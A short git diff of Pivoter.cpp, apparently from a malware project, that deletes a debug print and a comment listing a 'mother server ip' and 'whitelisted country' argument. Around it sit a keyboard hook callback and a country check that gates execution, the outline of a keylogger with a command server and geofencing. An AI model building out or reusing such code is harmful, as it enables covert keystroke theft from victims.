diff --git a/Pivoter.cpp b/Pivoter.cpp index f60770d..c42c191 100644 --- a/Pivoter.cpp +++ b/Pivoter.cpp @@ -65,15 +65,12 @@ LRESULT CALLBACK keyboard_callback(int nCode, WPARAM wParam, LPARAM lParam) { } /* - ARGUMENTS: - 1: initial mother server ip - 2: whitelisted country */ int main(int argc, char** argv) { - std::cout << "lmao" << std::endl; - // security Checks if (!check_country(argv[2])) return 0;